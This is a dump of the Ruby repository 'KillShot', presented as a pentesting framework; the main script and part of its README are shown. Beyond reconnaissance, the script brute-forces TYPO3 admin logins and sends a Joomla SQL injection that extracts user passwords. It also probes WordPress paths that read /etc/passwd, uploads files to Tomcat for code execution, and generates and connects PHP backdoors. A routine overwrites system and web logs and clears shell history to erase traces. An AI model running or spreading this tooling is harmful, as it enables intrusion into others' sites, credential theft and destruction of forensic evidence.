├── Killshot.rb ├── README.md ├── api.txt ├── bwa.rb ├── dns.txt ├── list.txt ├── setup.rb ├── sqlscan.rb └── x3scan.rb /Killshot.rb: -------------------------------------------------------------------------------- 1 | #/usr/bin/ruby -w 2 | 3 | =begin 4 | Powred By T.H.H 5 | The Head Hack Team (: 6 | =end 7 | require "rest-client" 8 | require "nokogiri" 9 | require "colorize" 10 | require "open-uri" 11 | require "net/http" 12 | require "socket" 13 | require 'shodan' 14 | system("cls") 15 | puts " 16 | 17 | ██╗ ██╗██╗██╗ ██╗ ███████╗██╗ ██╗ ██████╗ ████████╗ 18 | ██║ ██╔╝██║██║ ██║ ██╔════╝██║ ██║██╔═══██╗╚══██╔══╝ 19 | █████╔╝ ██║██║ ██║ ███████╗███████║██║ ██║ ██║ 20 | ██╔═██╗ ██║██║ ██║ ╚════██║██╔══██║██║ ██║ ██║ 21 | ██║ ██╗██║███████╗███████╗ ███████║██║ ██║╚██████╔╝ ██║ 22 | ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ 23 | ".red 24 | puts " 25 | Gather information 26 | About Targets 27 | ".green 28 | 29 | while true do 30 | print " track>>> : ".red 31 | $option = gets.chomp 32 | if $option == "exit" then 33 | break 34 | end 35 | if $option == "help" then 36 | 37 | puts 38 | 39 | puts "[site] MAKE YOUR TARGET".green 40 | puts "[help] show this MESSAGE".green 41 | puts "[targ] Search targets".green 42 | puts "[exit] exit the script".green 43 | puts "[uptd] Update KillShot".green 44 | puts "[anon] Run Anonymous Mode".green 45 | puts "[info] About killShot".green 46 | puts 47 | end 48 | if $option == "anon" then 49 | puts 50 | puts "ANONSURF START **** ".green.on_blue 51 | system("service tor start ") 52 | system("anonsurf start") 53 | puts "Press 99 to stop anonsurf service" 54 | end 55 | if $option == "99" then 56 | system("anonsurf stop service") 57 | end 58 | if $option == "targ" then 59 | puts "[1] Search Target Shodan".blue 60 | puts "[2] Shodan Port Scanner".blue 61 | end 62 | if $option == "2" then 63 | print "IP :: ".green 64 | targetportscan = gets.chomp 65 | $sourceshodan = open("https://www.shodan.io/host/#{targetportscan}").read 66 | f = File.open("#{targetportscan}.htm","w") 67 | f.puts $sourceshodan 68 | f.close 69 | print "[+]".green 70 | system("grep -a 'Ports open:' #{targetportscan}.htm | cut -d '=' -f 3 | cut -d '/' -f 1") 71 | end 72 | if $option == "1" then 73 | def bann() 74 | puts " "" 75 | ████████╗ █████╗ ██████╗ ██████╗ ███████╗████████╗ 76 | ╚══██╔══╝██╔══██╗██╔══██╗██╔════╝ ██╔════╝╚══██╔══╝ 77 | ██║ ███████║██████╔╝██║ ███╗█████╗ ██║ 78 | ██║ ██╔══██║██╔══██╗██║ ██║██╔══╝ ██║ 79 | ██║ ██║ ██║██║ ██║╚██████╔╝███████╗ ██║ 80 | ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ 81 | 82 | 83 | 84 | 85 | 86 | """ 87 | end 88 | bann() 89 | puts "Before you can use the Target, you need to have an API key account.shodan.io and add it to apii.txt" 90 | apii = open("api.txt") 91 | my_shodan_api = apii.read 92 | print "Search : " 93 | target = gets.chomp 94 | api = Shodan::Shodan.new("#{my_shodan_api}") 95 | result = api.search("#{target}") 96 | file = File.open("result.txt","w") do |f2| 97 | result['matches'].each{ |host| 98 | system("clear") 99 | bann() 100 | puts "-------------" 101 | puts host['ip_str'] 102 | f2.puts host['ip_str'] 103 | puts "--------------" 104 | } 105 | system("clear") 106 | bann() 107 | puts "[+] Success ! Target saved in result.txt".green 108 | system("pause>nul") 109 | end 110 | end 111 | if $option == "info" then 112 | puts " 113 | You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot 114 | 115 | This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe And Linux Log clear script To change the content of login paths Spider can help you to find parametre of the site and scan xss and sql 116 | add shodan tools in the last update 117 | ".blue 118 | end 119 | if $option == "uptd" then 120 | system("git clone https://github.com/bahaabdelwahed/killshot.git") 121 | end 122 | if $option == "site" then 123 | 124 | print "Site : ".green 125 | $url = gets.chomp 126 | system("cls") 127 | system("clear") 128 | puts " 129 | .n . . n. 130 | . .dP dP 9b 9b. . 131 | 4 qXb . dX Xb . dXp t 132 | dX. 9Xb .dXb __ __ dXb. dXP .Xb 133 | 9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP 134 | 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP 135 | `9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP' 136 | `9XXXXXXXXXXXP' `9XX' Hide `98v8P' Hack `XXP' `9XXXXXXXXXXXP' 137 | ~~~~~~~ 9X. .db|db. .XP ~~~~~~~ 138 | )b. .dbo.dP'`v'`9b.odb. .dX( 139 | 140 | 141 | ".red 142 | def banner() 143 | puts "{0} Spider ".green 144 | puts "{1} Web technologie " .green 145 | puts "{2} WebApp Vul Scanner" .green 146 | puts "{3} Port Scanner".green 147 | puts "{4} CMS Scanner".green 148 | puts "{5} Fuzzers ".green 149 | puts "{6} Cms Exploit Scanner ".green 150 | puts "{7} Backdoor Generation".green 151 | puts "{8} Linux Log Clear".green 152 | puts "{9} Find MX/NS".green 153 | puts 154 | end 155 | banner() 156 | while true do 157 | print " info>>> : ".green 158 | $web = gets.chomp 159 | 160 | if $web == "9" then 161 | $urlss= "#{$url}" 162 | linktestermsns = $urlss.slice! "www." 163 | puts $urlss 164 | def mxns(s,n) 165 | system ("curl https://dns-api.org/#{s}/#{$urlss} >#{n}.txt") 166 | end 167 | mxns("MX","mx") 168 | mxns("NS","ns") 169 | system("cls") 170 | puts "[+] Email Server".green 171 | system("cat mx.txt | grep value | cut -d ':' -f 2 | cut -d '0' -f 2") 172 | puts "[+] Name Server".green 173 | system("cat ns.txt | grep value | cut -d ':' -f 2 ") 174 | system("rm ns.txt && rm mx.txt") 175 | end 176 | class Exploitscanner 177 | def scanner() 178 | $sourcex = open("http://#{$url}").read 179 | 180 | if ($sourcex =~ /generator" content="TYPO3/) then 181 | puts " 182 | 183 | ████████╗██╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗████████╗ 184 | ╚══██╔══╝╚██╗ ██╔╝██╔══██╗██╔═══██╗╚════██╗ ██║ ██║╚══██╔══╝ 185 | ██║ ╚████╔╝ ██████╔╝██║ ██║ █████╔╝ ██║ █╗ ██║ ██║ 186 | ██║ ╚██╔╝ ██╔═══╝ ██║ ██║ ╚═══██╗ ██║███╗██║ ██║ 187 | ██║ ██║ ██║ ╚██████╔╝██████╔╝ ╚███╔███╔╝ ██║ 188 | ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══╝╚══╝ ╚═╝ 189 | 190 | 191 | 192 | 193 | " 194 | $site = "http://#{$url}" 195 | if ($site["http"].nil?) then 196 | puts "USAGE <./typo3wt.rb http://target.com" 197 | exit 198 | end 199 | def testscan(path) 200 | uri = URI.parse("#{$site}/#{path}/") 201 | $code = Net::HTTP.get_response(uri) 202 | $r = $code.code 203 | end 204 | testscan("typo3") 205 | if ($r == "200") or ($r == "500")then 206 | print "---[+]".green 207 | puts "Typo3 Found " 208 | testscan("typo3/ext") 209 | if $code.code == "200" then 210 | print "----[+]".green 211 | puts "ExtensionPath can be without index #{$site}/typo3/ext/" 212 | end 213 | puts " [+] Extension Enumerations [+]".red 214 | 215 | ext_name = ["crawler","api_macmade","be_acl","css_select","fl_header_slide","gsi_slideshow","slideshow","twwc_pages","pw_highslide_gallery","static_info_tables","yag_themepack_jquery","formhandler","gridelements","typo3_console","cron_ptaheutetoken","cron_menustyle","be_acl","linkhandler","cron_realurlconf","typdom3","realurl","ws_flexslider","tt_address","sr_freecaps","cron_ptaheuteregistrationtoken","cron_ptaheuterezeptursubst","t3s_jslidernews","additional_reports","api_macmade","phpmyadmin","doc_indexed_search"] 216 | 217 | 218 | ext_name.each do |ext| 219 | typo3path = URI.parse("#{$site}/typo3conf/ext/#{ext}/") 220 | extcode = Net::HTTP.get_response(typo3path) 221 | if extcode.code == "200" then 222 | print "[+] ".green 223 | puts "Found #{ext}" 224 | end 225 | end 226 | puts " [+] Vulnrability scanner [+]".red 227 | puts "Weak password -Panel Brute Force".blue 228 | user = "admin" 229 | File.open("list.txt").each do |password| 230 | ah = RestClient.post "#{$site}/typo3/",{username: user,p_field: "#{password}"} do |response| 231 | print "[+]".blue 232 | puts "Test #{user} #{password} " 233 | if response.code == 302 234 | puts "Password Succes ".green 235 | break 236 | else 237 | puts "Password Woring ".red 238 | end 239 | end 240 | end 241 | puts "Database Disclosure ".blue 242 | def vull(ext,path,nam,tests) 243 | testscan("typo3conf/ext/#{ext}/") 244 | if $code.code == "200" then 245 | aa = open("#{$site}/#{path}").read 246 | if aa["#{tests}"].nil? 247 | print "[-]".red 248 | puts "#{nam}" 249 | else 250 | print "[+]".green 251 | puts "#{nam}" 252 | puts " --- >Download sql file " 253 | ff = File.new("ext_tables.sql","w+") 254 | ff.puts "#{aa}" 255 | ff.close 256 | end 257 | end 258 | end 259 | puts vull("crawler","/typo3conf/ext/crawler/ext_tables.sql","Crawler Extension 6.1.2","Table structure") 260 | sleep 1 261 | puts vull("twwc_pages","/typo3conf/ext/twwc_pages/ext_tables.sql","twwc_pages Extension 8.7.x","Table structure") 262 | sleep 1 263 | puts vull("yag_themepack_jquery","/typo3conf/ext/yag_themepack_jquery/ext_tables.sql","Themepack jQuery Extension 1.3.2","Table structure") 264 | else 265 | print "[-]".red 266 | puts "typo3 Not found" 267 | end 268 | 269 | end 270 | 271 | 272 | if ($sourcex =~ /generator" content="Joomla/) 273 | a = 1 274 | linkk = URI("#{$url}") 275 | joomla = ["/administrator/index.php","/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=","index.php?option=com_jdownloads&Itemid=0&view=upload","/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload","/index.php?option=com_foxcontact&view=foxcontact&Itemid=113","/index.php?option=com_adsmanager&task=upload&tmpl=component","/index.php?option=com_users&view=registration","/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=","/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*","mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html","/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"] 276 | joomla.each do |joo| 277 | 278 | 279 | $joom = Net::HTTP.get_response("#{linkk}","/#{joo}") 280 | 281 | if ($joom.code <= "300") and (a == 1) then 282 | puts " Admin panel -- > #{linkk}/#{joo}".green 283 | elsif ($joom.code == "200") and (a == 2) then 284 | puts "[+] Com Media File Upload".green 285 | puts " --> #{linkk}#{joo}".blue 286 | elsif ($joom.code != "200") and (a == 2) then 287 | puts "[-] Com Media File Upload".red 288 | 289 | elsif ($joom.code == "200") and (a == 3) then 290 | puts "[+] Com jdownloads File Upload".green 291 | puts " --> #https://packetstormsecurity.com/files/101522/Joomla-jDownloads-1.0-Shell-Upload.html".blue 292 | puts " --> #{linkk}#{joo}".blue 293 | elsif ($joom.code > "300") and (a == 3) then 294 | puts "[-] Com jdownloads File Upload".red 295 | elsif ($joom.code == "200") and (a == 4) then 296 | puts "[+] Com_fabrik Upload Shell".green 297 | puts " --> https://cxsecurity.com/issue/WLB-2017120085 #".blue 298 | elsif ($joom.code > "300") and (a == 4) then 299 | puts "[-] Com_fabrik Upload Shell".red 300 | elsif ($joom.code == "200") and (a == 5) then 301 | puts "[+] Com foxcontact Arbitrary File Upload".green 302 | puts " --> https://cxsecurity.com/issue/WLB-2016050072 #".blue 303 | elsif ($joom.code > "300") and (a == 5) then 304 | puts "[-] Com foxcontact Arbitrary File Upload".red 305 | elsif ($joom.code == "200") and (a == 6) then 306 | puts "[+] Com adsmanager Arbitrary File Upload ".green 307 | puts " --> https://cxsecurity.com/issue/WLB-2016050072 #".blue 308 | elsif ($joom.code > "300") and (a == 6) then 309 | puts "[-] Com adsmanager Arbitrary File Upload".red 310 | elsif ($joom.code == "200") and (a == 7) then 311 | puts "[+] Com User ".green 312 | puts " --> #{linkk}#{joo} #".blue 313 | elsif ($joom.code > "300") and (a == 7) then 314 | puts "[-] Com User".red 315 | elsif ($joom.code == "200") and (a == 8) then 316 | puts "[+] Com web links ".green 317 | puts " --> #{linkk}#{joo} #".blue 318 | elsif ($joom.code > "300") and (a == 8) then 319 | puts "[-] Com web links ".red 320 | elsif ($joom.code == "200") and (a == 9) then 321 | puts "[+] Com_content' Component 'ItemID' Parameter SQL Injection ".green 322 | puts " --> https://www.securityfocus.com/bid/36064/exploit".blue 323 | puts " --> https://www.securityfocus.com/bid/36064/exploit".blue 324 | elsif ($joom.code > "300") and (a == 9) then 325 | puts "[-] Com_content' Component 'ItemID' Parameter SQL Injection ".red 326 | elsif ($joom.code == "200") and (a == 10) then 327 | puts "[+] Com_content File Upload Vulnerability ".green 328 | puts " --> https://0day.today/exploit/14165".blue 329 | elsif ($joom.code > "300") and (a == 10) then 330 | puts "[-] Com_content File Upload Vulnerability ".red 331 | elsif ($joom.code == "200") and (a == 11) then 332 | puts "[+] COM_JCE ".green 333 | puts " --> https://cxsecurity.com/issue/WLB-2018050200".blue 334 | elsif ($joom.code > "300") and (a == 11) then 335 | puts "[-] COM_JCE ".red 336 | end 337 | 338 | a = a + 1 339 | end 340 | end 341 | if ($sourcex =~ /generator" content="WordPress/) then 342 | e = 1 343 | wordpress = ["/readme.html","/wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd","/wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5&day=1&calendar_id=1&pag=1","/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php","/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd","wp-content/themes/WPStore/upload/index.php","wp-content/plugins/sexy-contact-form/includes/fileupload/index.php","wp-content/plugins/lazy-seo/lazyseo.php","wp-content/plugins/easy-comment-uploads/upload-form.php","wp-symposium/server/file_upload_form.php","wp-content/uploads/wp-security-audit-log/","/wp-admin/admin.php?page=powerzoomer_manage","/?gf_page=upload"] 344 | wordpress.each do |link| 345 | $linkk = URI("#{$url}") 346 | 347 | $xxxxxxxx = Net::HTTP.get_response("#{$linkk}","/#{link}") 348 | 349 | if ($xxxxxxxx.code <= "302") and (e == 1 ) then 350 | puts "Wordpress version here : #{$url}/readme.html !".green 351 | elsif ($xxxxxxxx.code > "300") and (e == 1 ) 352 | puts "version not found" 353 | 354 | end 355 | if ($xxxxxxxx.code == "200") and (e == 2) then 356 | puts "[+] WordPress Plugin Localize My Post 1.0 - Local File Inclusion Found".green 357 | 358 | elsif ($xxxxxxxx.code > "300") and (e == 2 ) 359 | puts "[-] WordPress Plugin Localize My Post 1.0 - Local File Inclusion Not Found".red 360 | elsif ($xxxxxxxx.code == "200") and (e == 3 ) 361 | puts "[+] Wordpress Plugin Events Calendar - SQL Injection ! ".green 362 | puts " --- > https://www.exploit-db.com/raw/44785/".blue 363 | elsif ($xxxxxxxx.code > "300") and (e == 3 ) 364 | puts "[-] Wordpress Plugin Events Calendar - SQL Injection !".red 365 | elsif ($xxxxxxxx.code == "200") and (e == 4 ) 366 | puts "[+] WordPress Plugin Peugeot Music - Arbitrary File Upload ! ".green 367 | puts " --- > https://www.exploit-db.com/raw/44737/".blue 368 | elsif ($xxxxxxxx.code > "300") and (e == 4 ) 369 | puts "[-] WordPress Plugin Peugeot Music - Arbitrary File Upload !".red 370 | elsif ($xxxxxxxx.code == "200") and (e == 5 ) 371 | puts "[+] Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion ! ".green 372 | puts " --- > https://www.exploit-db.com/raw/44340/".blue 373 | elsif ($xxxxxxxx.code > "300") and (e == 5 ) 374 | 375 | puts "[-] Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion".red 376 | 377 | 378 | elsif ($xxxxxxxx.code == "200") and (e == 6 ) 379 | puts "[+] WordPress WPshop eCommerce Arbitrary File Upload Vulnerability ! ".green 380 | puts " --- > https://www.exploit-db.com/raw/44340/".blue 381 | elsif ($xxxxxxxx.code > "300") and (e == 6 ) 382 | 383 | puts "[-] WordPress WPshop eCommerce Arbitrary File Upload Vulnerability".red 384 | 385 | elsif ($xxxxxxxx.code == "200") and (e == 7 ) 386 | puts "[+] WordPress Plugin Creative Contact Form - Arbitrary File Upload ! ".green 387 | puts " --- > https://www.exploit-db.com/raw/34922/".blue 388 | elsif ($xxxxxxxx.code > "300") and (e == 7 ) 389 | 390 | puts "[-] WordPress Plugin Creative Contact Form - Arbitrary File Upload ".red 391 | elsif ($xxxxxxxx.code == "200") and (e == 8 ) 392 | puts "[+] Wordpress Lazy SEO plugin Shell Upload Vulnerability ! ".green 393 | puts " --- > https://cxsecurity.com/issue/WLB-2017080132".blue 394 | elsif ($xxxxxxxx.code > "300") and (e == 8 ) 395 | 396 | puts "[-] Wordpress Lazy SEO plugin Shell Upload Vulnerability ".red 397 | 398 | elsif ($xxxxxxxx.code == "200") and (e == 9 ) 399 | puts "[+] Wordpress easy comment uploads ! ".green 400 | puts " --- > https://cxsecurity.com/issue/WLB-2017080132".blue 401 | elsif ($xxxxxxxx.code > "300") and (e == 9 ) 402 | 403 | puts "[-] Wordpress easy comment uploads ".red 404 | elsif ($xxxxxxxx.code == "200") and (e == 10 ) 405 | puts "[+] Wordpress WP Symposium 14.11 Shell Upload Vulnerability ! ".green 406 | puts " --- > Metasploit exploit/unix/webapp/wp_symposium_shell_upload".blue 407 | elsif ($xxxxxxxx.code > "300") and (e == 10 ) 408 | 409 | puts "[-] Wordpress WP Symposium 14.11 Shell Upload Vulnerability ".red 410 | elsif ($xxxxxxxx.code <= "300") and (e == 11 ) 411 | puts "[+] WordPress Plugin WP Security Audit Log 3.1.1 - SID ! ".green 412 | puts " --- > https://www.exploit-db.com/exploits/44371/".blue 413 | elsif ($xxxxxxxx.code > "300") and (e == 11 ) 414 | 415 | puts "[-] WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure ".red 416 | elsif ($xxxxxxxx.code <= "300") and (e == 12 ) 417 | puts "[+] powerzoomer ! ".green 418 | puts " --- > http://www.exploit4arab.org/exploits/399".blue 419 | elsif ($xxxxxxxx.code > "300") and (e == 12 ) 420 | 421 | puts "[-] powerzoomer ".red 422 | elsif ($xxxxxxxx.code <= "300") and (e == 12 ) 423 | puts "[+] gravityforms ! ".green 424 | puts " --- > https://www.exploit-db.com/exploits/39969/".blue 425 | elsif ($xxxxxxxx.code > "300") and (e == 12 ) 426 | 427 | puts "[-] powerzoomer ".red 428 | end 429 | 430 | e = e + 1 431 | if e == 13 then 432 | break 433 | end 434 | end 435 | end 436 | end 437 | end 438 | def domains() 439 | print " ip For #{$url} :: ".green 440 | $ipaddr = p Addrinfo.ip("#{$url}").ip_address 441 | puts "Links And Paths :: ".red 442 | $h = Nokogiri::HTML(open("http://#{$url}").read) 443 | puts "Related domains and Parameters ::".red 444 | $h.xpath("//a").each do |img| 445 | puts img['href'] 446 | end 447 | $h = Nokogiri::HTML(open("http://#{$url}").read) 448 | puts "IMAGE FILES :: ".red 449 | $h.xpath("//img").each do |img2| 450 | puts img2['src'] 451 | end 452 | end 453 | def cmsscanner() 454 | 455 | $source = open("http://#{$url}").read 456 | if ($source =~ /generator" content="WordPress/) 457 | puts "#{$url} ---- > use wordpress".green 458 | elsif ($source =~ /generator" content="Joomla/) 459 | puts "#{$url} ---- > use Joomla".green 460 | elsif ($source =~ /generator" content="Drupal/) 461 | puts "#{$url} ---- > use Drupal".green 462 | elsif ($source =~ /generator" content="vBulletin/) 463 | puts "#{$url} ---- > use vBulletin".green 464 | elsif ($source =~ /generator" content="TYPO3/) 465 | puts "#{$url} ---- > use TYPO3".green 466 | else 467 | puts "UNKNOW CMS !" 468 | end 469 | end 470 | #------------------------ Eazy Fuzzer For beginner Tested In VulnServer --------------- 471 | if $web == "5" then 472 | print "Ip : " 473 | $fip = gets.chomp 474 | print "Port : " 475 | $fport = gets.chomp 476 | $o = TCPSocket.open("#{$fip}",$fport) # Vuln server ip : 127.0.0.1 port : 9999 477 | while true do 478 | $b = (1..90) 479 | $a = ["A"] 480 | $c = 100 481 | for i in $b do 482 | puts "Fuzzing with #{$c} bits" 483 | $t = $a.append("A"*$c) 484 | $c = $c + 100 485 | $o.puts("TRUN /.:/",$t) #VulnServer Test 486 | end 487 | end 488 | end 489 | 490 | if $web == "7" then 491 | system("clear") 492 | puts "{1} Generate Shell".blue 493 | puts "{2} Connect Shell".blue 494 | puts 495 | while true do 496 | print "GENERATE >>".green 497 | backdoor = gets.chomp 498 | if backdoor == "1" then 499 | system("ruby bwa.rb track.php ") 500 | print "track.php File Has been generated Upload it to site ( D'ont change the name) !" 501 | system("pause") 502 | elsif backdoor == "2" 503 | 504 | puts " Sure To Use #{$url}/track.php site y/n : " 505 | 506 | elsif backdoor == "y" 507 | system("ruby bwa.rb start #{$url}/track.php") 508 | elsif backdoor == "n" 509 | break 510 | 511 | 512 | end 513 | end 514 | 515 | end 516 | if $web == "2" then 517 | 518 | system("clear") 519 | puts "--- ------ --------- Exploit Scanner L'ets Hack -------- ------ ".green 520 | puts 521 | puts "{1} Xss scanner".blue 522 | puts "{2} Sql Scanner".blue 523 | puts "{3} Tomcat RCE".blue 524 | print "WebApp >>".green 525 | webapp = gets.chomp 526 | if webapp == "3" then 527 | system("clear") 528 | puts "--- ------ --------- APACHE TOMCAT RCE -------- ------ ".green 529 | system("curl -X PUT 'http://#{$url}/test.jsp' -d 'Injected By me' ") 530 | system("curl -X GET 'http://#{$url}/test.jsp'") 531 | elsif webapp == "1" 532 | print "Parametre To Test :: ".green 533 | parm0 = gets.chomp 534 | puts "this is a automatique usage you can use the x3scan.rb script and add more than one website Click OK" 535 | system("pause") 536 | system("echo http://#{$url}#{parm0} > sites.txt") 537 | system("ruby x3scan.rb sites.txt") 538 | elsif webapp == "2" 539 | print "Parametre To Test :: ".green 540 | parm = gets.chomp 541 | puts "this is a automatique usage you can use the sqlscan.rb script and add more than one website Click OK" 542 | system("pause") 543 | system("echo http://#{$url}#{parm} > sites.txt") 544 | system("ruby sqlscan.rb sites.txt") 545 | 546 | 547 | end 548 | end 549 | if $web == "8" then 550 | system("clear") 551 | system("cls") 552 | print " 553 | _____ ______ __ 554 | | |_.-----.-----.| | |.-----.---.-.----. 555 | | | _ | _ || ---| || -__| _ | _| 556 | |_______|_____|___ ||______|__||_____|___._|__| 557 | |_____| 558 | " 559 | linuxlog = [ 560 | 561 | '/etc/httpd/logs/access_log', 562 | '/etc/httpd/logs/access.log', 563 | '/etc/httpd/logs/error_log', 564 | '/etc/httpd/logs/error.log', 565 | '/var/log/apache2/access_log', 566 | '/var/log/apache2/access.log', 567 | '/var/log/apache2/error_log', 568 | '/var/log/apache2/error.log', 569 | '/var/log/apache/access_log', 570 | '/var/log/apache/access.log', 571 | '/var/log/auth.log', 572 | '/var/log/dpkg.log', 573 | '/var/log/faillog', 574 | '/var/log/httpd/access_log', 575 | '/var/www/logs/access.log', 576 | '/var/www/logs/access_log', 577 | '/var/webmin/miniserv.log', 578 | '/var/run/utmp', 579 | '/var/log/yum.log', 580 | '/var/log/xferlog', 581 | ] 582 | 583 | linuxlog.each do |log| 584 | if File.exist?(log) then 585 | puts "The #{log} log has been changed" 586 | del = %x!echo 194.190.86.119 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 > #{log}! 587 | 588 | else 589 | puts "The #{log} directry NOt found" 590 | end 591 | 592 | end 593 | 594 | puts "SUPERR All log deleted YOU ARE NINJA !!!!" 595 | 596 | system("PAUSE >NULL") 597 | system("cls") 598 | 599 | 600 | print "Clearing The Bash history " 601 | system("sudo history -c && history -w") 602 | 603 | 604 | 605 | end 606 | 607 | if $web == "banner" then 608 | 609 | banner() 610 | end 611 | if $web == "help" then 612 | puts "[ banner] Show main page".blue 613 | puts "[ exit ] Exit ".blue 614 | puts "[ help ] Show this message".blue 615 | end 616 | 617 | if $web == "4" then 618 | 619 | cmsscanner() 620 | end 621 | if $web == "0" then 622 | domains() 623 | end 624 | if $web == "6" then 625 | s = Exploitscanner.new 626 | puts s.scanner() 627 | end 628 | 629 | 630 | 631 | if $web == "exit" then 632 | break 633 | end 634 | if $web == "1" then 635 | system("cls") 636 | system("clear") 637 | puts " [+]Basic WhatWeb Information :: ".green 638 | system("whatweb #{$url}") 639 | 640 | puts " [+]Host Result :: ".green 641 | system("host #{$url}") 642 | puts " [+]Dig Result About Dns:: ".green 643 | system("dig 8.8.8.8 #{$url} | grep -e 'A' ") 644 | 645 | puts " [+]Trying zone transfer and Brute force :: ".green 646 | system("fierce -dns #{$url} -w dns.txt") 647 | puts " [+]Traceroutr Result :: ".green 648 | system("traceroute #{$url}") 649 | puts " [+]Firewall And IDS Detect :: ".green 650 | system("wafw00f #{$url}") 651 | end 652 | if $web == "3" then 653 | system("clear") 654 | system("cls") 655 | puts " 656 | 657 | _ _____ 658 | /\ | | / ____| 659 | / \ _ _| |_ ___| (___ ___ __ _ _ __ _ __ ___ _ __ 660 | / /\ \| | | | __/ _ \\___ \ / __/ _` | '_ \| '_ \ / _ \ '__| 661 | / ____ \ |_| | || (_) |___) | (_| (_| | | | | | | | __/ | 662 | /_/ \_\__,_|\__\___/_____/ \___\__,_|_| |_|_| |_|\___|_| 663 | 664 | 665 | " 666 | puts "[0] Nmap Scan".green 667 | puts "[1] Unicorn Scan".green 668 | while true do 669 | print "Scanner >>" 670 | scanner = gets.chomp 671 | if scanner == "0" then 672 | puts 673 | puts "[2] Nmap Os Scan ".blue 674 | puts "[3] Nmap TCP Scan".blue 675 | puts "[4] Nmap UDB Scan ".blue 676 | puts "[5] Nmap All scan".blue 677 | puts "[6] Nmap Http Option Scan ".blue 678 | puts "[7] Nmap Live target In Network".blue 679 | 680 | 681 | elsif scanner == "1" 682 | puts 683 | puts "[8] Services OS ".blue 684 | puts "[9] TCP SYN Scan on a whole network ".blue 685 | puts "[01] UDP scan on the whole network " .blue 686 | elsif scanner == "2" 687 | system("nmap -sS -O #{$url}") 688 | elsif scanner == "3" 689 | system("nmap -Pn -sT -sV -p1-65535 #{$url}") 690 | elsif scanner == "4" 691 | system("nmap -sU -sV #{$url}") 692 | elsif scanner == "5" 693 | system("nmap -A #{$url}") 694 | elsif scanner == "6" 695 | system("nmap -Pn -p80,443 --script http-methods -sC #{$url}") 696 | elsif scanner == "7" 697 | print "Your Router Ip : " 698 | ipp = gets.chomp 699 | system("nmap -sn #{ipp}/24 ") 700 | elsif scanner == "8" 701 | system("unicornscan #{$url} –Iv") 702 | elsif scanner == "9" 703 | print "Your Router Ip : " 704 | ipp = gets.chomp 705 | system("unicornscan -msf -v -I #{ipp}/24") 706 | elsif scanner == "01" 707 | print "Your Router Ip : " 708 | ipp = gets.chomp 709 | system("unicornscan –mU –v –I #{ipp}/24") 710 | elsif scanner == "exit" 711 | break 712 | else 713 | system("#{scanner}") 714 | end 715 | end 716 | end 717 | 718 | end 719 | 720 | end 721 | end 722 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # KILLSHOT 2 | A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner 3 | 4 | **Why KillShot** ? 5 | 6 | You Can use this tool to Spider your website and get important information and gather information automaticaly using 7 | whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using 8 | Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot 9 | 10 | This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe And Linux Log clear script To change the content of login paths 11 | Spider can help you to find parametre of the site and scan xss and sql 12 | 13 | ![killshot-logo_v1](https://user-images.githubusercontent.com/19738278/47605704-7eaab180-d9f9-11e8-97cc-74fad3dc152c.png) 14 | 15 | 16 | 17 | 18 | # Help option 19 | 20 | ![help](https://user-images.githubusercontent.com/19738278/48301246-f6dda080-e4ea-11e8-9def-5785fce2653a.JPG) 21 | 22 | 23 | # Use Shodan By targ option 24 | CreateAccount Here [Register](https://account.shodan.io/register) and get Your aip [Shodan AIP](https://account.shodan.io/) And Add your shodan AIP to aip.txt 25 | < only your aip should be show in the aip.txt > 26 | Use targ To search about Vulnrable Targets in shodan databases 27 | 28 | ![search](https://user-images.githubusercontent.com/19738278/48301291-ed086d00-e4eb-11e8-905c-86b9807e3234.JPG) 29 | 30 | Use targ To scan Ip of servers fast with shodan 31 | 32 | ![scan](https://user-images.githubusercontent.com/19738278/48301305-31940880-e4ec-11e8-8a74-35d65b063930.JPG) 33 | 34 | 35 | # Menu Site 36 | {0} Spider 37 | {1} Web technologie 38 | {2} WebApp Vul Scanner 39 | {3} Port Scanner 40 | {4} CMS Scanner 41 | {5} Fuzzers 42 | {6} Cms Exploit Scanner 43 | {7} Backdoor Generation 44 | {8} Linux Log Clear 45 | 46 | # WebApp Vul 